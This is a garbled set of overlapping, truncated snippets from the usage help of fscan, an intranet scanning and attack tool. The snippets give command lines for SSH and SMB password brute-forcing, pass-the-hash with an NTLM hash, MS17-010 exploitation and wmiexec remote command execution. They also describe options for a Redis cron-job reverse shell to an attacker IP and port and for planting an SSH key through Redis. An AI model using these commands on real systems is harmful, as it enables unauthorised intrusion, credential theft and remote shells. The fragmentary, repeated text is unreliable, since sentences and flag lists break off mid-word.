fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口) fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/...
fcgi、smb romote file path-ping 使用ping代替icmp进行存活探测-pn string 扫描时要跳过的端口,as:-pn445-pocname string 指定web poc的模糊名字,-pocname weblogic-proxy string 设置代理,-proxy http://127.0.0.1:8080-user string 指定爆破时的用户名-userf string 指定爆破时的用户名文件-pwd string 指定...
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 ) fscan.ex...
-pwd string 指定爆破时的密码 -pwdf string 指定爆破时的密码文件 -rf string 指定redis写公钥用模块的文件 (as: -rf id_rsa.pub) -rs string redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666) -silent 静默扫描,适合cs扫描时不回显 -sshkey string ssh连接时,指定ssh私钥 -t int 扫描线程 ...
-path stringfcgi、smb romote file path-ping使用ping代替icmp进行存活探测-pn string扫描时要跳过的端口,as: -pn 445-pocname string指定web poc的模糊名字, -pocname weblogic-proxy string设置代理, -proxy http://127.0.0.1:8080-user string指定爆破时的用户名-userf string指定爆破时的用户名文件-pwd ...
2100,7180,9200") -ping using ping replace icmp -pocname string use the pocs these contain pocname, -pocname weblogic -proxy string set poc proxy, -proxy http://127.0.0.1:8080 -pwd string password -pwdf string password file -rf string redis file to write sshkey file (as: -rf id_...
pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 ) fscan.exe -h 192.168.1.1/24 -m smb -pwd ...
(内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具) fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4) fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec...
flag.StringVar(&Info.Password,"pwd","","password") flag.StringVar(&Info.Passfile,"pwdf","","password file") flag.StringVar(&Info.Outputfile,"o","result.txt","Outputfile") flag.Int64Var(&Info.Timeout,"time",3,"Set timeout")
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞) fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块) fscan.exe -hf ip.txt (以文件导入) fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080) ...